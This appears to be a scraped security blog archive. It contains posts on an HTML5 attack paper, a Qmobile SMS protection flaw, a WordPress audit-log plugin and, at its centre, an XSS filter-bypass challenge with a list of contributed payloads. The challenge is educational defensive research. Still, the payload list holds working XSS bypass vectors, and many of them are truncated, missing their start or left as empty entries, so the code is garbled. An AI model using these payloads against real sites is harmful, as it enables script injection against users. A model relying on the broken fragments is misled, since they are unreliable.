
HTML5 Modern Day Attack And Defence Vectors

Lately, a lot of people have been asking me the reason for my absence and for not being active on RHA. The answer is that there are countless factors, so many that I have lost count myself; had it been one, I might have remembered it. First of all, I was very busy with my studies, and I had also been working on my final year project, because it is right around the corner. All this work had been consuming a lot of my time, and then came the task of promoting my upcoming book "Ethical Hacking and Penetration Testing Guide", which took about 10 months to write. Along with it, I have been exploring new horizons with Web Application Firewalls and working on a tool to automatically bypass blacklist based WAFs.

From a research point of view, I spent the last four months researching attack vectors in HTML5 and documented them in an easy to understand manner as part of my semester project. However, I made several modifications later on to match publication standards so that I could publish it on my blog.

It has been more than six years since the advent of HTML5 (dating back to 2008), and as time has passed we have seen more and more websites using HTML5 features, and have witnessed technologies like Flash and Silverlight slowly dying.

However, each of the HTML5 features can bring security issues if not used correctly. One of the major security issues with HTML5 is DOM based XSS, due to the heavy use of JavaScript in HTML5 based applications, and this is naturally the prime highlight of this paper.

Being a firm believer in free education, here I present to you "HTML5 Modern Day Attack And Defence Vectors", free of cost and free of ads. Last but not least, I would like to sincerely thank "Lavakumar Kuppan" for his tremendous help; without him the quality of the paper would have been compromised. I hope you find it helpful.

You can download the paper by clicking the "DOWNLOAD" button below:

What's next?

I also spent some time researching previously unknown vulnerabilities in mobile browsers and applications. As soon as they are fixed, I will be disclosing a couple of zero day vulnerabilities in various apps, browsers etc. which I found during my encounter with the Qmobile Noir A20, which uses a customized version of Android OS. So stay tuned.


6/29/2014 - Fixed spelling mistakes and references.  
7/7/2014 - Fixed more spelling and code formatting mistakes

Rhainfosec XSS Challenge 2 - Writeup

Last week, we announced our second XSS challenge after the tremendous success of our first one. The challenge was based upon a blacklist based protection and the goal was to execute the JavaScript alert(1). We had a huge number of participants, and in total more than 15k attempts at breaking the XSS filter, of which only 15 were worthy enough to break it.

Challenge Setup

The following were some of the specifications for the challenge:

  • We blacklisted the alert, prompt, confirm and document.write functions, which are most commonly used to execute JavaScript.
  • We blacklisted opening and closing parentheses, which most XSS vectors require.
  • We blacklisted the source keyword to avoid an easy bypass.
  • We also blacklisted the common DOM references to the window object, such as this, top, window, self and parent (later whitelisted).
  • As per the rules, we specified that we would update the blacklist as soon as the challengers managed to find other ways to reference the window global variable, so that they would have to keep finding new ways to reference it.
  • PHP's htmlspecialchars() function was used, so it was impossible to escape out of the attribute, as the double quote was encoded.
  • The winners would be decided based upon the number of unique vectors.


We gave two interesting hints for the challenge:

  • "Use your parent to get to the top". We were referring to "parent" or "parentNode", which could be used as an alternative to the window object.
  • "parentNode": upon realizing that people were still not able to solve the challenge, we released another important hint, in which we actually revealed the name of the object.


At first, we received some ridiculously long solutions; however, it was only a matter of time before the participants were able to shorten them and came up with our expected solution. With that being said, let's now take a look at it: onerror=parentNode['inne'%2B'rHTML']=URL#<img src=x onerror=alert(1)>
The solution was pretty simple: we used parentNode to reference the innerHTML property and set it equal to URL, which is equivalent to document.URL. If you notice, we used %2B, which is the URL-encoded form of the + sign; we had to use the encoded version since the '+' sign itself was encoded.

Next, all we had to do was enter our vector after the hash sign; since anything after the hash is not sent to the server, we were able to inject the vector of our choice. However, this solution does not work in Firefox, since Firefox encodes the opening and closing brackets (<, >) placed after the hash when the source is set to document.URL.
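To make the two halves of the writeup concrete (the blacklist from the setup list, and the reason the expected solution slips past it), here is an added Python example that is not part of the original post or of the challenge code. It rebuilds a filter from the listed tokens, mimics PHP's htmlspecialchars() in its pre-8.1 default mode (double quote encoded, single quote not), and then uses the standard library HTML tokenizer to show which attributes a browser-style parser sees when the parameter lands in an unquoted attribute versus a quoted, fully encoded one. The unquoted src attribute as injection context, the "x " prefix in front of onerror, case-insensitive matching, and the host name are all assumptions; the post never shows the challenge page's source.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Tokens the challenge blacklisted, per the setup list in the writeup.
# "parent" was whitelisted later in the challenge, so it is absent here.
# Case-insensitive matching is an assumption; the post does not say how
# the real filter matched.
BLACKLIST = ("alert", "prompt", "confirm", "document.write", "(", ")",
             "source", "this", "top", "window", "self")


def blacklist_allows(value):
    """True when the (URL-decoded) parameter contains none of the blacklisted
    tokens, i.e. a filter built from the setup list would let it through."""
    lowered = value.lower()
    return not any(token in lowered for token in BLACKLIST)


def htmlspecialchars_compat(value):
    """Mimics PHP htmlspecialchars() in its pre-8.1 default mode (ENT_COMPAT):
    & < > and the double quote are encoded, the single quote is left alone."""
    return (value.replace("&", "&amp;").replace("<", "&lt;")
                 .replace(">", "&gt;").replace('"', "&quot;"))


def render_challenge_style(value):
    # Assumed injection context (assumption): the parameter is written into
    # an unquoted src attribute after htmlspecialchars().
    return "<img src=%s>" % htmlspecialchars_compat(value)


def render_hardened(value):
    # Same data, but the attribute is quoted and both quote characters are
    # encoded (html.escape with quote=True), so the value can neither close
    # the attribute nor start a new one.
    return '<img src="%s">' % html.escape(value, quote=True)


class _ImgAttributes(HTMLParser):
    """Collects the attributes the HTML tokenizer assigns to the <img> tag."""

    def __init__(self):
        super().__init__()
        self.found = {}

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.found = dict(attrs)


def img_attributes(markup):
    parser = _ImgAttributes()
    parser.feed(markup)
    parser.close()
    return parser.found


def server_visible_value(url, param="xss"):
    """The server-side filter only ever sees the query string; the fragment
    after '#' (where the real vector sits) never leaves the browser."""
    return parse_qs(urlsplit(url).query).get(param, [""])[0]


# Constructed URL: the host is a placeholder and the 'x ' in front of
# onerror is an assumption about how the expected solution was submitted.
CHALLENGE_URL = ("http://challenge.example/?xss=x%20onerror=parentNode['inne'%2B'rHTML']=URL"
                 "#<img src=x onerror=alert(1)>")

if __name__ == "__main__":
    value = server_visible_value(CHALLENGE_URL)
    print("server sees:        ", value)
    print("blacklist allows it:", blacklist_allows(value))
    print("unquoted attribute  ->", img_attributes(render_challenge_style(value)))
    print("quoted + encoded    ->", img_attributes(render_hardened(value)))
```

The design point is that the blacklist and htmlspecialchars() both operate on characters, while the injection works at the level of the HTML tokenizer: in an unquoted attribute a space ends the value, so whatever follows becomes a new attribute name. Quoting the attribute and encoding both quote characters fixes that class of problem regardless of which JavaScript identifiers the blacklist happens to cover; the fragment trick is also visible in server_visible_value, which never receives the part after the hash at all.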


Masato Kinugawa and Pepe Vila came up with an equal number of unique solutions; therefore they are both the conquerors of this challenge and are crowned as winners. Both of them kept coming up with exceptional bypasses, to the point where further blacklisting was not possible without actually breaking the challenge.

I would like to congratulate both of them, and would like to thank them and all the other participants for taking their precious time to participate in this challenge.

Challenge Link

We have already set up the challenge for you to be able to validate it. Special thanks to Giuseppe Trotta for hosting the challenge at

Solutions From Community

Let's now take a look at the solutions from the community. The list is in descending order, with the exception of Masato and Pepe Vila, who have an equal number of solutions.

1. Masato Kinugawa

Solution#1'x'onerror=head['innerHTM'%2B'L']=URL#<img src=x onerror=alert(1)>

Solution#2[0][%27innerH%27%2B%27TML%27]=URL#<img src=x onerror=alert(1)>

Solution#3[%27innerH%27%2B%27TML%27]=URL#<img src=x onerror=alert(1)>

Solution#4[%27innerH%27%2B%27TML%27]=URL#<img src=x onerror=alert(1)>

Solution#5['documen'%2B't']['bod'%2B'y']['innerHTM'%2B'L']=URL#<img src=x onerror=alert(1)>

(IE only):['documen'%2B't']['bod'%2B'y']['innerHTM'%2B'L']=URL#<img src=x onerror=alert(1)>

Safari only:
( Please click the go button. FYI, document.domain='com' vector no longer works on Chrome.)

Firefox only:'x'onerror=content['documen'%2B't']['bod'%2B'y']['innerHTM'%2B'L']=content['documen'%2B't']['locatio'%2B'n']['has'%2B'h']#<img src=x onerror=alert(1)>

function go(){"javascript:alert(1)""
<button onclick=go()>go</button>

It works on both Firefox and IE:'x'id='a'onerror=a['ownerD'%2B'ocument']['bod'%2B'y']['innerHTM'%2B'L']=a['ownerD'%2B'ocument']['locatio'%2B'n']['has'%2B'h']#<img src=x onerror=alert(1)>





or if you blacklist "target" it's still possible to use "srcElement" or





Solution#9["innerHTM"%2b"L"]=URL%27onerror=a={};a[src="logo.png"]=a=activeElement#<img/src=x onerror=alert(1)>


3. Mathias


<body onload="location='*/alert(1)';">Click me</body>

var x ='["loc"%2b"ation"]="javascri"%2b"pt:/*"%2

["innerHTM"%2b"L"]=event.view["locatio"%2b"n"]["has"%2b"h"]'#<img src=x onerror=alert(1)>

location="'vbs:setTimeout %22setTimeout windo%22%26%22w.nam%22%26%22e%22'"

2Bnavigator.userAgent[12]%2B1%2Bnavigator.userAgent[27];", "_self");

4. Masahiro YAMADA

Update: Masahiro YAMADA has done a detailed writeup of his solutions here.  

if ("") {
location.href = location.href + "?x=<"+"img src=. onerror=alert(1)>";

<a href=';["par"%2B"entE"%2B"lement"]["innerHTM"%2B"L]["par"%2B"entE"%2B"lement"]["par"%2B"entE"%2B"lement"]["ownerD"%2B"ocument"].referrer&#x27;' target="_blank">go</a>

function goXss() {
var w =;"<"+"img src=. onerror=alert(1)>";

["innerHTM"%2B"L"];lt=o[11];gt=o[o.length-1];e["innerHTM"%2B"L"]=lt%2B"img src=. onerror=al"%2B"ert%26%23x28;1%26%23x29;"%2Bgt'

5. Luat Nguyen

Solution #1:
?xss='1' id=xxx['outerHTM'%2b'L']=parent['locatio'%2b'n']['has'%2b'h'] #<svg onload=alert(1)>

Solution #2:
?xss='1' id=xxx abc='aler%26%23x74%26%23x28%201%26%23x29' onload=1 onerror=xxx['innerHTM'%2b'L']=xxx['attribut'%2b'es']['abc']['valu'%2b'e'];xxx['attribut'%2b'es']['onload']['valu'%2b'e']=xxx['innerHTM'%2b'L'];xxx.src='logo'
(is not using location.hash)

6. file descriptor



7. Roman Shafigullin

for Chrome[onerror%2B%27%27][0];attributes[1].value=%27aler%27%2B%27t%27%2Bv[16]%2B1%2Bv[22];src=2

for firefox'x' onerror=v=[onerror%2B''][0];attributes[0].value='aler'%2B't'%2Bv[16]%2B1%2Bv[38];src=2

8. Ahmed Nafeez

Bnavigator.userAgent[12]%2B1%2Bnavigator.userAgent[36];", "_self");

p%27%2B%27t:aler%27%2B%27t%27%2Bopener[l].search[6]%2B1%2Bopener[l].search[6]", "_self");

9. Frans Rosen

Solution#1[%27innerHT%27%2b%27ML%27]=URL#<img src=x onerror=alert(1)>

10. Denis Kolegov

<script>"'locatio'%2b'n';parent[c]=parent['n'%2b'ame']", "javascript:alert(1)");

11. topol

Solution#1 onerror=parentNode['innerH'%2b'TML']=parent['loca'%2b'tion']['ha'%2b'sh']#<img src=a onerror=alert(1)>

12. romain

Solution#1[%27documen%27%2b%27t%27][%27bod%27%2b%27y%27][%27innerHTM%27%2b%27L%27]=%27%27%2bparent[%27locatio%27%2b%27n%27][%27has%27%2b%27h%27]#<img src=. onerror=alert(1) >

13. Giuseppe Trotta


14. Alan Bishop

<a href="
22%5d%27#<img src=x onerror='alert(1)'>">click me</a>
POC link -

15. Mramydnei

Vector:<svg onload=alert(1)>
a onerror=parentNode['outerH'+'TML']=referrer


The challenge was based upon very strict blacklist rules; however, the bypasses prove yet again that "blacklists" have never been, and never will be, the solution for mitigating cross site scripting attacks. In case I have missed any of your submissions, please let me know and I will update the post accordingly.

Last but not least, I would like to sincerely thank "Prakhar Prasad" for hosting the challenge, "Alex Infuhr" for ideas to make the challenge more interesting and "Giuseppe Trotta" for hosting the challenge on

I would love to hear your feedback! Leave your comments. Cheers.

A Simple Design Flaw In Qmobile's Messaging System


This post describes a simple design flaw in Qmobile handsets, and explains why you shouldn't rely upon built-in password protection mechanisms and why encryption is the better solution. The testing was carried out on a Qmobile Noir A20. The problem lies in the fact that even after the messages have been password protected, other applications which hold the READ_SMS permission can read the SMS in clear text, defeating the purpose of the password.

Qmobile, whose smartphones run a customized version of Android OS, ships its own messaging app with the additional functionality of password protecting the messages, thus preventing unauthorized access to them.

Google Hangout

Google Hangouts is a very popular Android app used by millions of users for sending and receiving messages, and it is likely to be present on almost every Android phone. As discussed before, the Qmobile messaging app allows users to password protect their messages. However, this does not prevent Google Hangouts, or any other app that has read access to messages, from reading them, because the Qmobile messaging app does not encrypt the messages.


The following video demonstrates the issue:

Since mobile security has never been my area of research, I asked one of my friends, "Francesco Stillavato", for his opinion on this issue. For those of you who don't know, Francesco is the author of the "Mobile Application And Penetration Testing Course" at . Take a look at his opinion:

I agree with you: the application password protection isn't enough if you really want to protect your data (SMS in this case). There are many things to consider when implementing this type of security mechanism: for example, if the app stores its data on the memory card (not encrypted), almost every application would be able to read it. It's still important to note that in this case, during the installation process, Hangouts requires permission to read SMS; so if you accept and install it, you are granting that permission to the app.

While this may seem obvious, you should consider that if someone is able to physically access your device (open the Play Store and install an application), the application password protection may fail! So if you really want to protect your app data, you should consider implementing encryption (maybe using a master password) or storing data in its own sandbox (like the SMS app) without allowing other apps to ask for read permissions.

Here is what world renowned Android security expert and CEO of Attify, "Aditya Gupta", has to say about this issue:

QMobile should ensure that, rather than giving users a false sense of security with the password protection of the messaging app (which could be easily bypassed), they also encrypt the messages while storing them on the device if a user opts in for the password based security.

If you have any questions or opinions, feel free to ask.

RHAinfoSec XSS Challenge - 2

Update: The results are announced here.

Welcome readers,

After the tremendous response to our first XSS challenge, we decided to make your lives a bit harder this summer by launching another one. As always, our challenges are challenging and based upon real world scenarios, and the key to solving them mostly relies upon the ability to think outside the box.
The challenge is based upon a strong blacklist based protection; beware that the challenge may be very hard for you unless you understand the right injection context.

Challenge Rules/Goals

  • The goal of the challenge is to execute alert(1) inside the browser.
  • Your payload must render JavaScript inside modern browsers.
  • The X-XSS-Protection header has been set to 0, which turns off your browser's client side XSS filter.

Challenge Link

Special thanks to Mr Prakhar Prasad for deploying the challenge, and to Alex Infuhr for beta testing and ideas for the challenge.


  • If all you can do is "><img src=x onerror=prompt(1);>, then our humble apologies, this challenge is not for you.
  • The WAF can be very hard if you don't know how to properly reverse engineer filter rules.
  • You can refer to my "XSS Filter Evasion Cheat Sheet" for ideas on cracking this challenge.
  • Automated scanners won't help here, as they often fail at producing context based payloads.


Submit your vector to or, or DM me on Twitter @rafaybaloch once you have cracked this challenge.

Hardening WordPress Security By Monitoring Malicious User Activities

WordPress has become the most popular content management system; it drives more than 20% of the websites on the internet. Such popularity has also made WordPress a very popular hacker target, and as a matter of fact one can find ample information about WordPress security. But although there is a lot of information about WordPress security, the WordPress security community is missing out on something very important: WordPress monitoring and logging!

Why Logging and Monitoring is Important

Operating systems, network hardware and software log everything that is happening to a log file or some sort of auditing database. For example, Windows has the Event Viewer and Linux / Unix operating systems use syslog.

From time to time administrators analyse logs to ensure that everything is working properly and that everyone is playing by the rules, i.e. not trying to tamper with the system. In fact, analysing logs helps administrators identify suspicious behaviour, hence preventing malicious attacks.

Logs also come in handy in case of an attack. For example, if a website or server is hacked, administrators analyse the logs to trace back the attack and identify the security hole the malicious hacker exploited. Once the security hole has been identified, administrators can work with the development team or vendor to close it and ensure that it cannot be exploited again in the future.

Management also finds logs very handy because they allow it to track and monitor user activity and productivity. Monitoring of system and user activity is a must to ensure both user productivity and the security of the system.

Monitor WordPress Sites Activity

As with any other system, keeping an audit log of the activity on WordPress sites and blogs, especially WordPress multisite installations, is a must if you want to ensure the security of WordPress, and also user productivity.

WP Security Audit Log

WP Security Audit Log is a free WordPress monitoring plugin that tracks all activity on WordPress and WordPress multisite websites, enabling administrators and WordPress owners to keep track of everything that is happening on their WordPress installation, identify suspicious behaviour and prevent malicious hack attacks.

WP Security Audit Log logs an alert each time a user logs in or out, or creates, modifies or deletes content such as blog posts, pages and custom post types. What makes WP Security Audit Log better than other monitoring and auditing plugins are its comprehensive WordPress alerts. For example, if some content is changed it does not simply issue a generic "content has been modified" alert, but specifically reports what has changed: it raises a different alert if a URL or category has changed, if the blog status or visibility has changed, if the author, date, page template or parent has changed, and much more.

Apart from content activity it also monitors the WordPress installation and system. Below is a list of some of the activity that WP Security Audit Log monitors:

  • User profile changes, such as email, role and password changes
  • Widget changes; for example an alert is generated if a new widget is created, or existing widgets are moved, modified or deleted
  • Plugin changes; an alert is generated if a new plugin is installed or if an existing one is updated or uninstalled
  • Theme monitoring; a new theme is installed or activated
  • WordPress system changes; WP Security Audit Log also monitors WordPress updates, permalink changes, administrator notification email changes, default user role changes etc.
  • Source code changes; an alert is raised if plugin or theme files are modified

Administrators can use the Audit Log Viewer, shown in the screenshot below, to view all the WordPress security alerts generated by the plugin while monitoring WordPress.

Detailed WordPress Alerts

As per the screenshot below, each WordPress alert generated by the plugin includes information about the actual change being reported, the user's WordPress username, avatar and role, the source IP, and the date and time.

It is also possible to enable the Data Inspector from the plugin's settings to get more details about the reported alert, such as the file triggering the alert, the user's User Agent string etc.

From the plugin settings administrators can also enable PHP alerts, so the plugin reports any PHP errors and warnings, enabling administrators to also keep track of PHP problems, which are typically created when a WordPress website is hacked.

It is also possible to disable any of the alerts, if for example you do not want to be alerted each time a user logs in or out, as seen in the screenshot below.
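The fields listed above for an alert (username, role, source IP, date and time, and the kind of change) are enough to build simple detections on top of such a log, which is the point of keeping it in the first place. The following Python is an added example, not part of this post and not the WP Security Audit Log plugin's own code or log format; its pipe-separated record layout and the sample events are constructed for illustration. It flags the categories from the list above that change what code runs on the site (plugin, theme and source file changes), role changes that grant administrator, and logins from an address never seen before for that user.

```python
from dataclasses import dataclass
from datetime import datetime

# Constructed sample audit records (not WP Security Audit Log output).
# Fields: date and time | username | role | source IP | kind of change | detail
SAMPLE_LOG = """\
2014-06-30 09:01:12|editor1|editor|203.0.113.5|login|success
2014-06-30 09:05:44|editor1|editor|203.0.113.5|post_modified|post 42: category changed
2014-06-30 09:30:10|admin|administrator|203.0.113.5|login|success
2014-06-30 09:31:02|admin|administrator|203.0.113.5|plugin_updated|example-plugin
2014-06-30 23:14:03|editor1|editor|198.51.100.7|login|success
2014-06-30 23:15:20|editor1|editor|198.51.100.7|plugin_installed|example-helper
2014-06-30 23:16:01|editor1|editor|198.51.100.7|file_modified|wp-content/themes/example/footer.php
2014-06-30 23:17:40|editor1|administrator|198.51.100.7|role_changed|editor -> administrator
"""

# Alert categories from the post's list that change what code runs on the site.
CODE_CHANGING_ACTIONS = {"plugin_installed", "plugin_updated", "plugin_uninstalled",
                         "theme_installed", "theme_activated", "file_modified"}


@dataclass
class AuditEvent:
    time: datetime
    user: str
    role: str
    ip: str
    action: str
    detail: str


def parse_log(text):
    """Parse the constructed pipe-separated records into AuditEvent objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, user, role, ip, action, detail = line.split("|", 5)
        events.append(AuditEvent(datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"),
                                 user, role, ip, action, detail))
    return events


def find_suspicious(events):
    """Return (time, severity, message) findings, in log order.
    Rules:
      - login from an IP never seen before for that user      -> MEDIUM
      - plugin/theme/source change by a non-administrator, or
        from an IP the user has not logged in from            -> HIGH
      - role change that grants administrator                  -> HIGH
    """
    findings = []
    known_ips = {}  # user -> set of IPs seen at login
    for e in events:
        seen = known_ips.setdefault(e.user, set())
        if e.action == "login":
            if seen and e.ip not in seen:
                findings.append((e.time, "MEDIUM", f"{e.user} logged in from new IP {e.ip}"))
            seen.add(e.ip)
        elif e.action in CODE_CHANGING_ACTIONS:
            if e.role != "administrator" or e.ip not in seen:
                findings.append((e.time, "HIGH", f"{e.user} ({e.role}) {e.action}: {e.detail}"))
        elif e.action == "role_changed" and e.detail.endswith("administrator"):
            findings.append((e.time, "HIGH", f"{e.user} granted administrator ({e.detail})"))
    return findings


if __name__ == "__main__":
    for when, severity, message in find_suspicious(parse_log(SAMPLE_LOG)):
        print(f"{when:%Y-%m-%d %H:%M:%S} [{severity}] {message}")
```

In the sample, the administrator's routine plugin update from a known address produces nothing, while the editor's late-night sequence (new IP, plugin install, theme file edit, self-promotion to administrator) yields one MEDIUM and three HIGH findings. The value of the audit log is exactly that this sequence is visible as a sequence; any single event on its own is easy to rationalise.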

Delegation of WordPress Security Monitoring

By default only administrators can view the alerts, switch alerts on or off, modify alert pruning etc. It is also possible to allow specific users or roles to view the alerts or modify any of the plugin settings, as seen in the screenshot below.

WordPress Administrators Should Use WP Security Audit Log

It is impossible to track user activity and productivity, and to ensure the security of your WordPress, unless you have WP Security Audit Log; therefore such a plugin comes in very handy, especially if you have hundreds of users on your WordPress, or if you have multiple websites and a large number of users on a WordPress multisite installation.

Download WP Security Audit Log from the official WordPress plugin repository and visit the official WP Security Audit Log plugin page for more information about the plugin.
